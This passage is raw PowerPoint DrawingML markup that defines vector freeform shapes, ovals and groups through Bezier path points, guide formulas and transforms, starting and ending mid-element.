                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="215"/>
                      <a:pt x="52" y="214"/>
                      <a:pt x="53" y="214"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="214"/>
                      <a:pt x="53" y="215"/>
                      <a:pt x="53" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="216"/>
                      <a:pt x="54" y="217"/>
                      <a:pt x="55" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="223"/>
                      <a:pt x="62" y="226"/>
                      <a:pt x="67" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="229"/>
                      <a:pt x="77" y="228"/>
                      <a:pt x="82" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="224"/>
                      <a:pt x="86" y="222"/>
                      <a:pt x="87" y="220"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="222"/>
                      <a:pt x="91" y="224"/>
                      <a:pt x="93" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="228"/>
                      <a:pt x="103" y="229"/>
                      <a:pt x="108" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="226"/>
                      <a:pt x="117" y="223"/>
                      <a:pt x="120" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="217"/>
                      <a:pt x="121" y="216"/>
                      <a:pt x="122" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="215"/>
                      <a:pt x="122" y="214"/>
                      <a:pt x="122" y="214"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="214"/>
                      <a:pt x="123" y="215"/>
                      <a:pt x="123" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="216"/>
                      <a:pt x="125" y="216"/>
                      <a:pt x="125" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="219"/>
                      <a:pt x="135" y="220"/>
                      <a:pt x="140" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="218"/>
                      <a:pt x="146" y="217"/>
                      <a:pt x="148" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="214"/>
                      <a:pt x="151" y="212"/>
                      <a:pt x="152" y="210"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="168" y="171"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="172"/>
                      <a:pt x="168" y="173"/>
                      <a:pt x="168" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="180"/>
                      <a:pt x="164" y="185"/>
                      <a:pt x="158" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="187"/>
                      <a:pt x="153" y="187"/>
                      <a:pt x="151" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="177"/>
                      <a:pt x="158" y="168"/>
                      <a:pt x="158" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="163"/>
                      <a:pt x="166" y="166"/>
                      <a:pt x="168" y="171"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="166" y="138"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="139"/>
                      <a:pt x="167" y="140"/>
                      <a:pt x="167" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="146"/>
                      <a:pt x="163" y="151"/>
                      <a:pt x="157" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="151"/>
                      <a:pt x="157" y="150"/>
                      <a:pt x="157" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="142"/>
                      <a:pt x="153" y="135"/>
                      <a:pt x="151" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="127"/>
                      <a:pt x="165" y="131"/>
                      <a:pt x="166" y="138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6" y="111"/>
                      <a:pt x="155" y="114"/>
                      <a:pt x="154" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="152" y="119"/>
                      <a:pt x="151" y="121"/>
                      <a:pt x="148" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="115"/>
                      <a:pt x="143" y="109"/>
                      <a:pt x="140" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="101"/>
                      <a:pt x="143" y="100"/>
                      <a:pt x="144" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="98"/>
                      <a:pt x="154" y="102"/>
                      <a:pt x="155" y="107"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="87" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="6"/>
                      <a:pt x="146" y="33"/>
                      <a:pt x="146" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="97"/>
                      <a:pt x="120" y="123"/>
                      <a:pt x="87" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="123"/>
                      <a:pt x="29" y="97"/>
                      <a:pt x="29" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="33"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="87" y="6"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="20" y="107"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="102"/>
                      <a:pt x="26" y="98"/>
                      <a:pt x="31" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="100"/>
                      <a:pt x="33" y="101"/>
                      <a:pt x="35" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="109"/>
                      <a:pt x="29" y="115"/>
                      <a:pt x="26" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="121"/>
                      <a:pt x="22" y="119"/>
                      <a:pt x="21" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="114"/>
                      <a:pt x="19" y="111"/>
                      <a:pt x="20" y="107"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="141"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="140"/>
                      <a:pt x="8" y="139"/>
                      <a:pt x="9" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="131"/>
                      <a:pt x="17" y="127"/>
                      <a:pt x="24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2" y="135"/>
                      <a:pt x="20" y="142"/>
                      <a:pt x="18" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="150"/>
                      <a:pt x="18" y="151"/>
                      <a:pt x="17" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="151"/>
                      <a:pt x="8" y="146"/>
                      <a:pt x="8" y="141"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="186"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="185"/>
                      <a:pt x="10" y="183"/>
                      <a:pt x="9" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="178"/>
                      <a:pt x="6" y="174"/>
                      <a:pt x="7" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="171"/>
                      <a:pt x="7" y="171"/>
                      <a:pt x="7" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="166"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="168"/>
                      <a:pt x="18" y="177"/>
                      <a:pt x="24" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="187"/>
                      <a:pt x="19" y="187"/>
                      <a:pt x="17" y="186"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="36" y="212"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="211"/>
                      <a:pt x="26" y="206"/>
                      <a:pt x="26" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="199"/>
                      <a:pt x="27" y="198"/>
                      <a:pt x="27" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="195"/>
                      <a:pt x="28" y="194"/>
                      <a:pt x="29" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="198"/>
                      <a:pt x="42" y="203"/>
                      <a:pt x="50" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="211"/>
                      <a:pt x="42" y="214"/>
                      <a:pt x="36" y="212"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="78" y="219"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="221"/>
                      <a:pt x="72" y="222"/>
                      <a:pt x="69" y="221"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="220"/>
                      <a:pt x="63" y="218"/>
                      <a:pt x="61" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="213"/>
                      <a:pt x="59" y="211"/>
                      <a:pt x="59" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="210"/>
                      <a:pt x="75" y="211"/>
                      <a:pt x="84" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="211"/>
                      <a:pt x="84" y="212"/>
                      <a:pt x="84" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="215"/>
                      <a:pt x="81" y="218"/>
                      <a:pt x="78" y="219"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="114" y="215"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="218"/>
                      <a:pt x="109" y="220"/>
                      <a:pt x="106" y="221"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="222"/>
                      <a:pt x="99" y="221"/>
                      <a:pt x="97" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="218"/>
                      <a:pt x="92" y="215"/>
                      <a:pt x="91" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="211"/>
                      <a:pt x="91" y="211"/>
                      <a:pt x="91" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="211"/>
                      <a:pt x="108" y="210"/>
                      <a:pt x="116" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="208"/>
                      <a:pt x="116" y="208"/>
                      <a:pt x="116" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="211"/>
                      <a:pt x="115" y="213"/>
                      <a:pt x="114" y="215"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="87" y="204"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="204"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="31" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="170"/>
                      <a:pt x="25" y="152"/>
                      <a:pt x="25" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="135"/>
                      <a:pt x="34" y="120"/>
                      <a:pt x="40" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="122"/>
                      <a:pt x="69" y="130"/>
                      <a:pt x="87" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="130"/>
                      <a:pt x="123" y="122"/>
                      <a:pt x="135" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="120"/>
                      <a:pt x="146" y="135"/>
                      <a:pt x="150" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="151"/>
                      <a:pt x="150" y="151"/>
                      <a:pt x="150" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="152"/>
                      <a:pt x="150" y="152"/>
                      <a:pt x="150" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="152"/>
                      <a:pt x="155" y="170"/>
                      <a:pt x="144" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="198"/>
                      <a:pt x="115" y="204"/>
                      <a:pt x="87" y="204"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="147" y="207"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="209"/>
                      <a:pt x="142" y="211"/>
                      <a:pt x="139" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="213"/>
                      <a:pt x="132" y="213"/>
                      <a:pt x="129" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="210"/>
                      <a:pt x="125" y="208"/>
                      <a:pt x="124" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="203"/>
                      <a:pt x="141" y="198"/>
                      <a:pt x="146" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="194"/>
                      <a:pt x="148" y="195"/>
                      <a:pt x="148" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="198"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="148" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="202"/>
                      <a:pt x="148" y="205"/>
                      <a:pt x="147" y="2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9" name="Freeform 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF3D396-3582-4E78-91C6-71535DC7D9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19" y="2148"/>
                <a:ext cx="324" cy="228"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 124 w 135"/>
                  <a:gd name="T1" fmla="*/ 76 h 95"/>
                  <a:gd name="T2" fmla="*/ 130 w 135"/>
                  <a:gd name="T3" fmla="*/ 43 h 95"/>
                  <a:gd name="T4" fmla="*/ 130 w 135"/>
                  <a:gd name="T5" fmla="*/ 42 h 95"/>
                  <a:gd name="T6" fmla="*/ 130 w 135"/>
                  <a:gd name="T7" fmla="*/ 42 h 95"/>
                  <a:gd name="T8" fmla="*/ 115 w 135"/>
                  <a:gd name="T9" fmla="*/ 0 h 95"/>
                  <a:gd name="T10" fmla="*/ 67 w 135"/>
                  <a:gd name="T11" fmla="*/ 21 h 95"/>
                  <a:gd name="T12" fmla="*/ 20 w 135"/>
                  <a:gd name="T13" fmla="*/ 0 h 95"/>
                  <a:gd name="T14" fmla="*/ 5 w 135"/>
                  <a:gd name="T15" fmla="*/ 42 h 95"/>
                  <a:gd name="T16" fmla="*/ 5 w 135"/>
                  <a:gd name="T17" fmla="*/ 42 h 95"/>
                  <a:gd name="T18" fmla="*/ 5 w 135"/>
                  <a:gd name="T19" fmla="*/ 43 h 95"/>
                  <a:gd name="T20" fmla="*/ 11 w 135"/>
                  <a:gd name="T21" fmla="*/ 76 h 95"/>
                  <a:gd name="T22" fmla="*/ 67 w 135"/>
                  <a:gd name="T23" fmla="*/ 95 h 95"/>
                  <a:gd name="T24" fmla="*/ 124 w 135"/>
                  <a:gd name="T25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95">
                    <a:moveTo>
                      <a:pt x="124" y="76"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="61"/>
                      <a:pt x="130" y="43"/>
                      <a:pt x="130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26" y="26"/>
                      <a:pt x="121" y="11"/>
                      <a:pt x="115" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="13"/>
                      <a:pt x="86" y="21"/>
                      <a:pt x="67" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="21"/>
                      <a:pt x="32" y="13"/>
                      <a:pt x="20" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="11"/>
                      <a:pt x="8" y="26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0" y="61"/>
                      <a:pt x="11" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="89"/>
                      <a:pt x="40" y="95"/>
                      <a:pt x="67" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="95"/>
                      <a:pt x="114" y="89"/>
                      <a:pt x="124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0" name="Oval 62">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71BC7909-21DF-4F67-9DB3-713C1989443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741" y="1901"/>
                <a:ext cx="281" cy="28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1" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC2477A8-2A42-4497-A541-CDBACBBA88DA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0384769">
              <a:off x="3550356" y="5647699"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="154" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{255DA9C7-9F1D-4EFC-ABB2-8CC8F6BCD3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Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7AD6A0-58D4-4383-9D7A-28934EE16E1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2" name="Group 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D744CDB-4229-4922-9EA1-9F59FB834992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4752501" y="-20975"/>
              <a:ext cx="1426490" cy="1396254"/>
              <a:chOff x="2208" y="1508"/>
              <a:chExt cx="1321" cy="1293"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="152" name="Freeform 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B732FEE5-3BCF-4C45-866C-A2352EEADBA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949" y="1807"/>
                <a:ext cx="580" cy="823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3" name="Freeform 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F9D8ACE-E128-4D10-A991-9C1EC62ABB1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208" y="1508"/>
                <a:ext cx="1031" cy="1293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3" name="Group 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E78109-8BC6-4496-BFA9-CC05E2E48F77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1187272">
              <a:off x="2574844" y="-137511"/>
              <a:ext cx="696926" cy="867919"/>
              <a:chOff x="2343" y="1490"/>
              <a:chExt cx="1076" cy="1340"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="147" name="Oval 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1525530A-95C3-492A-9B11-432687275701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53" y="1699"/>
                <a:ext cx="42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Oval 73">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E06170-B3D2-4283-B1CC-2C3E20EE5CA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767" y="1699"/>
                <a:ext cx="43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9" name="Freeform 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B0D653-822D-433E-8AA4-1135B1B82F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67" y="1832"/>
                <a:ext cx="228" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 96"/>
                  <a:gd name="T1" fmla="*/ 34 h 34"/>
                  <a:gd name="T2" fmla="*/ 96 w 96"/>
                  <a:gd name="T3" fmla="*/ 34 h 34"/>
                  <a:gd name="T4" fmla="*/ 48 w 96"/>
                  <a:gd name="T5" fmla="*/ 0 h 34"/>
                  <a:gd name="T6" fmla="*/ 0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0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83" y="24"/>
                      <a:pt x="51" y="2"/>
                      <a:pt x="48" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="2"/>
                      <a:pt x="14" y="2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0" name="Freeform 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660FB604-643B-48C9-85B3-24BDB5C834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67" y="1930"/>
                <a:ext cx="228" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 96"/>
                  <a:gd name="T1" fmla="*/ 34 h 34"/>
                  <a:gd name="T2" fmla="*/ 96 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 0 w 96"/>
                  <a:gd name="T5" fmla="*/ 0 h 34"/>
                  <a:gd name="T6" fmla="*/ 48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48" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="31"/>
                      <a:pt x="83" y="10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0"/>
                      <a:pt x="45" y="31"/>
                      <a:pt x="4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1" name="Freeform 76">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A8A10BD-5591-41B0-B366-D5FED411985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343" y="1490"/>
                <a:ext cx="1076" cy="1340"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 402 h 564"/>
                  <a:gd name="T2" fmla="*/ 367 w 452"/>
                  <a:gd name="T3" fmla="*/ 269 h 564"/>
                  <a:gd name="T4" fmla="*/ 360 w 452"/>
                  <a:gd name="T5" fmla="*/ 135 h 564"/>
                  <a:gd name="T6" fmla="*/ 226 w 452"/>
                  <a:gd name="T7" fmla="*/ 0 h 564"/>
                  <a:gd name="T8" fmla="*/ 92 w 452"/>
                  <a:gd name="T9" fmla="*/ 135 h 564"/>
                  <a:gd name="T10" fmla="*/ 85 w 452"/>
                  <a:gd name="T11" fmla="*/ 269 h 564"/>
                  <a:gd name="T12" fmla="*/ 0 w 452"/>
                  <a:gd name="T13" fmla="*/ 402 h 564"/>
                  <a:gd name="T14" fmla="*/ 83 w 452"/>
                  <a:gd name="T15" fmla="*/ 406 h 564"/>
                  <a:gd name="T16" fmla="*/ 83 w 452"/>
                  <a:gd name="T17" fmla="*/ 558 h 564"/>
                  <a:gd name="T18" fmla="*/ 83 w 452"/>
                  <a:gd name="T19" fmla="*/ 564 h 564"/>
                  <a:gd name="T20" fmla="*/ 369 w 452"/>
                  <a:gd name="T21" fmla="*/ 564 h 564"/>
                  <a:gd name="T22" fmla="*/ 369 w 452"/>
                  <a:gd name="T23" fmla="*/ 552 h 564"/>
                  <a:gd name="T24" fmla="*/ 369 w 452"/>
                  <a:gd name="T25" fmla="*/ 552 h 564"/>
                  <a:gd name="T26" fmla="*/ 369 w 452"/>
                  <a:gd name="T27" fmla="*/ 406 h 564"/>
                  <a:gd name="T28" fmla="*/ 452 w 452"/>
                  <a:gd name="T29" fmla="*/ 402 h 564"/>
                  <a:gd name="T30" fmla="*/ 265 w 452"/>
                  <a:gd name="T31" fmla="*/ 69 h 564"/>
                  <a:gd name="T32" fmla="*/ 293 w 452"/>
                  <a:gd name="T33" fmla="*/ 98 h 564"/>
                  <a:gd name="T34" fmla="*/ 265 w 452"/>
                  <a:gd name="T35" fmla="*/ 126 h 564"/>
                  <a:gd name="T36" fmla="*/ 237 w 452"/>
                  <a:gd name="T37" fmla="*/ 98 h 564"/>
                  <a:gd name="T38" fmla="*/ 265 w 452"/>
                  <a:gd name="T39" fmla="*/ 69 h 564"/>
                  <a:gd name="T40" fmla="*/ 226 w 452"/>
                  <a:gd name="T41" fmla="*/ 135 h 564"/>
                  <a:gd name="T42" fmla="*/ 293 w 452"/>
                  <a:gd name="T43" fmla="*/ 181 h 564"/>
                  <a:gd name="T44" fmla="*/ 226 w 452"/>
                  <a:gd name="T45" fmla="*/ 228 h 564"/>
                  <a:gd name="T46" fmla="*/ 159 w 452"/>
                  <a:gd name="T47" fmla="*/ 181 h 564"/>
                  <a:gd name="T48" fmla="*/ 224 w 452"/>
                  <a:gd name="T49" fmla="*/ 137 h 564"/>
                  <a:gd name="T50" fmla="*/ 226 w 452"/>
                  <a:gd name="T51" fmla="*/ 135 h 564"/>
                  <a:gd name="T52" fmla="*/ 187 w 452"/>
                  <a:gd name="T53" fmla="*/ 69 h 564"/>
                  <a:gd name="T54" fmla="*/ 216 w 452"/>
                  <a:gd name="T55" fmla="*/ 98 h 564"/>
                  <a:gd name="T56" fmla="*/ 187 w 452"/>
                  <a:gd name="T57" fmla="*/ 126 h 564"/>
                  <a:gd name="T58" fmla="*/ 159 w 452"/>
                  <a:gd name="T59" fmla="*/ 98 h 564"/>
                  <a:gd name="T60" fmla="*/ 187 w 452"/>
                  <a:gd name="T61" fmla="*/ 69 h 564"/>
                  <a:gd name="T62" fmla="*/ 116 w 452"/>
                  <a:gd name="T63" fmla="*/ 552 h 564"/>
                  <a:gd name="T64" fmla="*/ 159 w 452"/>
                  <a:gd name="T65" fmla="*/ 527 h 564"/>
                  <a:gd name="T66" fmla="*/ 202 w 452"/>
                  <a:gd name="T67" fmla="*/ 552 h 564"/>
                  <a:gd name="T68" fmla="*/ 116 w 452"/>
                  <a:gd name="T69" fmla="*/ 552 h 564"/>
                  <a:gd name="T70" fmla="*/ 214 w 452"/>
                  <a:gd name="T71" fmla="*/ 552 h 564"/>
                  <a:gd name="T72" fmla="*/ 159 w 452"/>
                  <a:gd name="T73" fmla="*/ 515 h 564"/>
                  <a:gd name="T74" fmla="*/ 131 w 452"/>
                  <a:gd name="T75" fmla="*/ 520 h 564"/>
                  <a:gd name="T76" fmla="*/ 133 w 452"/>
                  <a:gd name="T77" fmla="*/ 381 h 564"/>
                  <a:gd name="T78" fmla="*/ 229 w 452"/>
                  <a:gd name="T79" fmla="*/ 267 h 564"/>
                  <a:gd name="T80" fmla="*/ 321 w 452"/>
                  <a:gd name="T81" fmla="*/ 386 h 564"/>
                  <a:gd name="T82" fmla="*/ 322 w 452"/>
                  <a:gd name="T83" fmla="*/ 523 h 564"/>
                  <a:gd name="T84" fmla="*/ 289 w 452"/>
                  <a:gd name="T85" fmla="*/ 515 h 564"/>
                  <a:gd name="T86" fmla="*/ 233 w 452"/>
                  <a:gd name="T87" fmla="*/ 552 h 564"/>
                  <a:gd name="T88" fmla="*/ 214 w 452"/>
                  <a:gd name="T89" fmla="*/ 552 h 564"/>
                  <a:gd name="T90" fmla="*/ 246 w 452"/>
                  <a:gd name="T91" fmla="*/ 552 h 564"/>
                  <a:gd name="T92" fmla="*/ 289 w 452"/>
